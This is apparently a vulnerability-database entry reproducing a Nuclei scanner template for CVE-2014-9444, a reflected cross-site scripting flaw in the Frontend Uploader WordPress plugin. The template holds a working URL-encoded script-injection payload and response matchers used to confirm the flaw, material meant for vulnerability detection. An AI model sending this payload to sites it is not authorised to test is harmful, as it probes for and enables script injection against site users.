Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2014-9444
HistorySep 13, 2021 - 10:33 p.m.

Frontend Uploader <= 0.9.2 - Cross-Site Scripting

2021-09-1322:33:49
ProjectDiscovery
github.com
1
cve-2014-9444
cross-site scripting
wordpress
unauthenticated
remote attackers
security vulnerability

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

AI Score

6

Confidence

High

EPSS

0.003

Percentile

69.1%

The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.

id: CVE-2014-9444

info:
  name: Frontend Uploader <= 0.9.2 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.
  impact: |
    Allows remote attackers to inject arbitrary web script or HTML via a crafted file name, leading to potential session hijacking, defacement, or data theft.
  remediation: |
    Update to the latest version of the Frontend Uploader plugin (0.9.2) or apply the vendor-supplied patch to fix the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7
    - https://nvd.nist.gov/vuln/detail/CVE-2014-9444
    - http://packetstormsecurity.com/files/129749/WordPress-Frontend-Uploader-0.9.2-Cross-Site-Scripting.html
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2014-9444
    cwe-id: CWE-79
    epss-score: 0.00619
    epss-percentile: 0.78788
    cpe: cpe:2.3:a:frontend_uploader_project:frontend_uploader:0.9.2:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: frontend_uploader_project
    product: frontend_uploader
    framework: wordpress
  tags: cve2014,cve,wp-plugin,xss,wpscan,packetstorm,wordpress,unauth,frontend_uploader_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022047b35642f70a3b53211ace11f861e4765249fb4244c05f753ab279f89879e116022100c4a70fe22de8bb7f0a109f44b262232d559cc447faac3c2b2cb095908d770b8e:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

AI Score

6

Confidence

High

EPSS

0.003

Percentile

69.1%